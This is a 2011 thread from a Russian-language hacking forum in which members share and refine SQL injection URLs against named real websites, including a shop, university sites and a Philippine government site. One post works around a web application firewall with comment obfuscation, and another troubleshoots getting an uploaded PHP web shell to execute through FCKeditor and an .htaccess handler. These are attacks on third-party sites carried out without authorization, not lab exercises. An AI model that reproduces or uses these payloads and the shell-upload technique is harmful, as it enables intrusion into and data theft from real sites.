HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #18761  
Старый 04.12.2011, 02:13
shadowrun
Постоянный
Регистрация: 29.08.2010
Сообщений: 842
Провел на форуме:
183267

Репутация: 84


По умолчанию

Код:
http://www.hobbyshop.com.ua/dir.php?id=-223%27+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34+--+
Цитата:
Сообщение от None  
Найдено достаточно много товаров, пожалуйста уточните поисковый запрос
 
Ответить с цитированием

  #18762  
Старый 04.12.2011, 05:06
AnGeI
Участник форума
Регистрация: 08.12.2008
Сообщений: 164
Провел на форуме:
862722

Репутация: 54
По умолчанию

Код:
www.guu.ru/info.php?id=-1+order+by+1+--+
Не получается раскрутить.
 
Ответить с цитированием

  #18763  
Старый 04.12.2011, 06:28
A_n_d_r_e_i
Участник форума
Регистрация: 02.09.2009
Сообщений: 286
Провел на форуме:
3426765

Репутация: 257
По умолчанию

Цитата:
Сообщение от AnGeI  
Код:
www.guu.ru/info.php?id=-1+order+by+1+--+
Не получается раскрутить.
Иньекции нету
 
Ответить с цитированием

  #18764  
Старый 04.12.2011, 08:48
Ereee
Постоянный
Регистрация: 01.12.2011
Сообщений: 560
Провел на форуме:
102354

Репутация: 267


По умолчанию

Цитата:
Сообщение от AnGeI  
Код:
www.guu.ru/info.php?id=-1+order+by+1+--+
Не получается раскрутить.
A_n_d_r_e_i прав. Но не стоит опускать руки. Есть другие

Код HTML:
http://www.hbs-guu.ru/news3.html?item_id=-139+and+1=1+union+select+1,2,version(),4,5,6--+f
 
Ответить с цитированием

  #18765  
Старый 04.12.2011, 14:51
Unknown
Новичок
Регистрация: 21.06.2005
Сообщений: 1
Провел на форуме:
0

Репутация: 0
По умолчанию

Народ вот копался на 1м IPB форуме нашел там страничку с вот такими параметрами:

Код:
http://site.com/forum/index.php?andor_type=and&app=core&do=search&module=search&search_app=forums&search_app_filters[core][sortDir]=0&search_app_filters[core][sortKey]=date&search_app_filters[core][sortKey]=date&search_content=both&search_date_end=01/01/1967&search_date_start=01/01/1967&search_tags=17&search_term=&sid=66bd76f74ed93a979f202dc202ec3fa4
На этой странице выдало:

Код:
Site.com Driver Error

There appears to be an error with the database.

If you are seeing this page, it means there was a problem communicating with our database. Sometimes this error is temporary and will go away when you refresh the page. Sometimes the error will need to be fixed by an administrator before the site will become accessible again.

You can try to refresh the page by clicking here
Может ли эта ошибка каким нибудь способом вести к Sql иньекции или еще чему нибудь?
 
Ответить с цитированием

  #18766  
Старый 04.12.2011, 15:09
lightangel
Познающий
Регистрация: 07.11.2011
Сообщений: 91
Провел на форуме:
35174

Репутация: -6
По умолчанию

I have a problem here.

Код:
http://www.pasigcity.gov.ph/subpages/news.aspx?nSeq=183+and+1=0+/!*union*/+/*!select*/+0,1,2,3,4,5,6,7,8
Код:
WebKnight Application Firewall Alert

Your request triggered an alert! If you feel that you have received this page in error, please contact the administrator of this web site.

What is WebKnight?
AQTRONIX WebKnight is an application firewall for web servers and is released under the GNU General Public License. It is an ISAPI filter for securing web servers by blocking certain requests. If an alert is triggered WebKnight will take over and protect the web server.

For more information on WebKnight: http://www.aqtronix.com/WebKnight/

AQTRONIX WebKnight
How do I execute?
 
Ответить с цитированием

  #18767  
Старый 04.12.2011, 15:12
BlooD_BASH
Новичок
Регистрация: 03.12.2011
Сообщений: 0
Провел на форуме:
0

Репутация: 0
По умолчанию

XSS

У меня такой нубский вопрос...

Если XSS выполняются на стороне клиента, то почему нельзя составить такой запрос на JS чтобы он например отсылал на FTP файл со сврего компа? Я понимаю что если бы это было возможно, кто-нибудь бы это уже сделал, мне просто интересно что мешает?
 
Ответить с цитированием

  #18768  
Старый 04.12.2011, 16:05
Ereee
Постоянный
Регистрация: 01.12.2011
Сообщений: 560
Провел на форуме:
102354

Репутация: 267


По умолчанию

Цитата:
Сообщение от shadowrun  
Код:
http://www.hobbyshop.com.ua/dir.php?id=-223%27+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34+--+
Бро, другой параметр пробуй

Код HTML:
http://www.hobbyshop.com.ua/goods.php?id=4766'-999.9+union+select+1,2,3,version(),5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5--+f
 
Ответить с цитированием

  #18769  
Старый 04.12.2011, 17:16
Melfis
Постоянный
Регистрация: 25.04.2011
Сообщений: 505
Провел на форуме:
195266

Репутация: 53


По умолчанию

Цитата:
Сообщение от BlooD_BASH  
У меня такой нубский вопрос...
Если XSS выполняются на стороне клиента, то почему нельзя составить такой запрос на JS чтобы он например отсылал на FTP файл со сврего компа? Я понимаю что если бы это было возможно, кто-нибудь бы это уже сделал, мне просто интересно что мешает?
Политика безопасности браузеров. Для жс запрет на работу с фс.
 
Ответить с цитированием

  #18770  
Старый 04.12.2011, 19:28
wkar
Познающий
Регистрация: 18.10.2009
Сообщений: 80
Провел на форуме:
1180165

Репутация: 11
По умолчанию

Привет, помогите разобраться:

На сайте есть fckeditor 2.3.2, Заливаю шелл smile.php.gif > smile_php.gif и хтацес, в котором

SetHandler application/x-httpd-php

При заходе на шелл target.com/files/smile_php.gif его просто качает..

В чем проблема ?
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.